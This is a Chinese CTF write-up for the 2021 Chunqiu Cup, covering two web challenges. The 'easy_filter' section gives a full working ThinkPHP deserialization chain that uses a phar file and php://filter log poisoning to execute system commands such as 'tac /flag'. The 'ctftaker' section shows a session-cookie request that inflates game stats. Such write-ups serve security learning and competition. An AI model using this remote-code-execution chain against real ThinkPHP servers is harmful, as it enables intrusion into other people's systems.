【wp】ctf-2021春秋杯

admin

101109
文章

87
评论

2021年10月6日22:02:31评论395 views字数 8936阅读29分47秒阅读模式

ctf-2021春秋杯

【wp】ctf-2021春秋杯

easy_filter

<?phpnamespace think{    abstract class Model{        protected $append = [];        private $data = [];        function __construct(){            $this->append = ["ethan"=>["dir","calc"]];            $this->data = ["ethan"=>new Request()];        }    }    class Request{        protected $hook = [];        protected $filter = "system";        protected $config = [        // 表单请求类型伪装变量        'var_method'       => '_method',        // 表单ajax伪装变量        'var_ajax'         => '_ajax',        // 表单pjax伪装变量        'var_pjax'         => '_pjax',        // PATHINFO变量名 用于兼容模式        'var_pathinfo'     => 's',        // 兼容PATH_INFO获取        'pathinfo_fetch'   => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],        // 默认全局过滤方法 用逗号分隔多个        'default_filter'   => '',        // 域名根，如thinkphp.cn        'url_domain_root'  => '',        // HTTPS代理标识        'https_agent_name' => '',        // IP代理获取标识        'http_agent_ip'    => 'HTTP_X_REAL_IP',        // URL伪静态后缀        'url_html_suffix'  => 'html',        ];        function __construct(){        $this->filter = "system";        $this->config = ["var_ajax"=>''];        $this->hook = ["visible"=>[$this,"isAjax"]];        }    }}

namespace thinkprocesspipes{    use thinkmodelconcernConversion;    use thinkmodelPivot;    class Windows{        private $files = [];        public function __construct(){            $this->files=[new Pivot()];    }    }}namespace thinkmodel{    use thinkModel;    class Pivot extends Model{

    }}namespace {    use thinkprocesspipesWindows;    // echo base64_encode(serialize(new Windows()));    @unlink("phar.phar");    $phar = new Phar("phar.phar"); //后缀名必须为phar    $phar->startBuffering();    $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub    $o = new Windows();    $phar->setMetadata($o); //将自定义的meta-data存入manifest    $phar->addFromString("test.txt", "test"); //添加要压缩的文件    //签名自动计算    $phar->stopBuffering();}/*input=TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czo1OiJldGhhbiI7YToyOntpOjA7czozOiJkaXIiO2k6MTtzOjQ6ImNhbGMiO319czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czo1OiJldGhhbiI7TzoxMzoidGhpbmtcUmVxdWVzdCI6Mzp7czo3OiIAKgBob29rIjthOjE6e3M6NzoidmlzaWJsZSI7YToyOntpOjA7cjo5O2k6MTtzOjY6ImlzQWpheCI7fX1zOjk6IgAqAGZpbHRlciI7czo2OiJzeXN0ZW0iO3M6OToiACoAY29uZmlnIjthOjE6e3M6ODoidmFyX2FqYXgiO3M6MDoiIjt9fX19fX0=&id=whoami*/?>

cat phar.phar | base64 -w 0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:] + '=00' for i in sys.stdin.read()]).upper())"

import requests# host = "http://127.0.0.1:80/public"host ='http://eci-2ze5b7k5rcrtgb6lqz3z.cloudeci1.ichunqiu.com/index.php'burp0_url = host + "/index/index/hello?file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=/var/www/html/runtime/log/202105/29.log"requests.get(burp0_url)burp00_url = host + "/index/index/hello?file=AA"requests.get(burp00_url)burp01_url = host + "/index/index/hello?file=AA=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=72=00=42=00=41=00=51=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=4C=00=41=00=51=00=41=00=41=00=54=00=7A=00=6F=00=79=00=4E=00=7A=00=6F=00=69=00=64=00=47=00=68=00=70=00=62=00=6D=00=74=00=63=00=63=00=48=00=4A=00=76=00=59=00=32=00=56=00=7A=00=63=00=31=00=78=00=77=00=61=00=58=00=42=00=6C=00=63=00=31=00=78=00=58=00=61=00=57=00=35=00=6B=00=62=00=33=00=64=00=7A=00=49=00=6A=00=6F=00=78=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=4D=00=30=00=4F=00=69=00=49=00=41=00=64=00=47=00=68=00=70=00=62=00=6D=00=74=00=63=00=63=00=48=00=4A=00=76=00=59=00=32=00=56=00=7A=00=63=00=31=00=78=00=77=00=61=00=58=00=42=00=6C=00=63=00=31=00=78=00=58=00=61=00=57=00=35=00=6B=00=62=00=33=00=64=00=7A=00=41=00=47=00=5A=00=70=00=62=00=47=00=56=00=7A=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=50=00=4F=00=6A=00=45=00=33=00=4F=00=69=00=4A=00=30=00=61=00=47=00=6C=00=75=00=61=00=31=00=78=00=74=00=62=00=32=00=52=00=6C=00=62=00=46=00=78=00=51=00=61=00=58=00=5A=00=76=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=68=00=63=00=48=00=42=00=6C=00=62=00=6D=00=51=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=31=00=4F=00=69=00=4A=00=6C=00=64=00=47=00=68=00=68=00=62=00=69=00=49=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=7A=00=4F=00=69=00=4A=00=6B=00=61=00=58=00=49=00=69=00=4F=00=32=00=6B=00=36=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=51=00=36=00=49=00=6D=00=4E=00=68=00=62=00=47=00=4D=00=69=00=4F=00=33=00=31=00=39=00=63=00=7A=00=6F=00=78=00=4E=00=7A=00=6F=00=69=00=41=00=48=00=52=00=6F=00=61=00=57=00=35=00=72=00=58=00=45=00=31=00=76=00=5A=00=47=00=56=00=73=00=41=00=47=00=52=00=68=00=64=00=47=00=45=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=31=00=4F=00=69=00=4A=00=6C=00=64=00=47=00=68=00=68=00=62=00=69=00=49=00=37=00=54=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=64=00=47=00=68=00=70=00=62=00=6D=00=74=00=63=00=55=00=6D=00=56=00=78=00=64=00=57=00=56=00=7A=00=64=00=43=00=49=00=36=00=4D=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6F=00=62=00=32=00=39=00=72=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=64=00=6D=00=6C=00=7A=00=61=00=57=00=4A=00=73=00=5A=00=53=00=49=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=6A=00=6F=00=35=00=4F=00=32=00=6B=00=36=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=59=00=36=00=49=00=6D=00=6C=00=7A=00=51=00=57=00=70=00=68=00=65=00=43=00=49=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=6B=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=5A=00=70=00=62=00=48=00=52=00=6C=00=63=00=69=00=49=00=37=00=63=00=7A=00=6F=00=32=00=4F=00=69=00=4A=00=7A=00=65=00=58=00=4E=00=30=00=5A=00=57=00=30=00=69=00=4F=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=32=00=39=00=75=00=5A=00=6D=00=6C=00=6E=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=64=00=6D=00=46=00=79=00=58=00=32=00=46=00=71=00=59=00=58=00=67=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=44=00=6F=00=69=00=49=00=6A=00=74=00=39=00=66=00=58=00=31=00=39=00=66=00=58=00=30=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=2F=00=4D=00=65=00=78=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=61=00=47=00=63=00=79=00=42=00=72=00=68=00=73=00=64=00=4D=00=44=00=44=00=74=00=71=00=69=00=66=00=74=00=4A=00=7A=00=4D=00=71=00=41=00=6B=00=4B=00=46=00=49=00=49=00=43=00=41=00=41=00=41=00=41=00=52=00=30=00=4A=00=4E=00=51=00=67=00=3D=00=3D=00"requests.get(burp01_url)burp02_url = host + "/index/index/hello?file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=/var/www/html/runtime/log/202105/29.log"requests.get(burp02_url)burp03_url = host + "/index/index/hello?file=phar:///var/www/html/runtime/log/202105/29.log&id=tac /flag"res = requests.get(burp03_url)print(res.text)

【wp】ctf-2021春秋杯

flag{d94da2d7-574e-46b6-87a3-33c90fe3767a}

ctftaker

源码

【wp】ctf-2021春秋杯

POST /levelup HTTP/1.1Host: eci-2zebjnza8y58psty4hey.cloudeci1.ichunqiu.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1620482691; UM_distinctid=1794c4ba07562-01cbdedfb764ce8-c791039-1aeaa0-1794c4ba0769b9; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; __jsluid_h=954b9eeb8fc650893eb6696dbe7afbe5; session=eyJoaXN0b3J5IjpbIuS9oOaYr+S4gOS9jeWLh+aVoueahGN0ZmVyIiwi5ZCs6K+05Zyo6YGl6L+c55qE5b285bK4Iiwi5a2Y5Zyo552A5LiA5Liq56We56eY5bel5YW3Iiwi5Lyg6K+05Y+q6KaB6I635b6X5LqG6L+Z5Liq5bel5YW3Iiwi5bCx5Y+v5Lul5LiA6ZSuIHB5dGhvbjMgLi9leHAucHkgaXAgcG9ydCDmi79zaGVsbCIsIuS4uuS6hui1ouW+l+avlOi1m++8jOi1sOS4iuS6uueUn+W3heWzsO+8jOS9oOS4jemhvuaXgeS6uueahOmEmeinhuS4juWKnemYu++8jOavheeEtuWGs+eEtueahOi1sOS4iuS6hui/meadoei3r+OAgiIsIuato+WcqOeUn+aIkOaAqueJqVtkZWxheSgxMDAwKV0uW2RlbGF5KDEwMDApXS5bZGVsYXkoMTAwMCldLltkZWxheSgxMDAwKV0uW2RlbGF5KDEwMDApXS4iXSwicGxheWVyIjp7Im5hbWUiOiJQbGF5ZXIiLCJmYWN0b3IiOjk5OTk5OTk5OSwiQVRLIjo5OTk5OTksIkRFRiI6OTk5OTk5OTksIkhQIjo5OTk5OTk5OTl9LCJjb2luIjoxLCJpbml0Ijp0cnVlLCJtb25zdGVyIjpbXX0=; session.sig=pvQuGF6QvbkG8T1pL9isXJmifzUUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cacheContent-Type: application/jsonContent-Length: 18
{"f":"12222+2222"}

获取大量攻击力等等

【wp】ctf-2021春秋杯

带着cookie 多次请求

得到flag

【wp】ctf-2021春秋杯

把[delay(1000*10)]替换成空

【wp】ctf-2021春秋杯

flag{fc2b633a-5f4a-4d26-94bf-3f152d4872b0}

更多CTF-Wrietup 请关注EDI安全！

EDI安全的CTF战队经常参与各大CTF比赛，了解CTF赛事，我们在为打造安全圈好的技术氛围而努力，这里绝对是你学习技术的好地方。这里门槛不是很高，但师傅们经验丰富，可以带着你一起从基础开始，只要你有持之以恒努力的决心，下一个CTF大牛就是你。

欢迎各位大佬小白入驻，大家一起打CTF，一起进步

EDI安全

EDI安全

扫二维码｜关注我们

一个专注渗透实战经验分享的公众号

本文始发于微信公众号（bgbing安全）：【wp】ctf-2021春秋杯

左青龙
微信扫一扫

右白虎
微信扫一扫

【wp】ctf-2021春秋杯

东区-第二届数据安全大赛暨首届数信杯数据安全大赛 WP

第二届数据安全大赛暨首届数信杯北部赛区writeup

2024 数信杯

第二届数据安全大赛暨首届数信杯积分争夺赛实践预赛南区Writeup

第二届数据安全大赛暨首届数信杯东部赛区writeup

西区-第二届数据安全大赛暨首届数信杯数据安全大赛 WP

阿里云CTF2024-暴力ENOTYOURWORLD题解

HackPack（LLM挑战）Writeup

第四届红明谷杯卫星应用数据安全大赛 WEB writeup

阿里云第三届伏魔挑战赛wp

发表评论

在线咨询

微信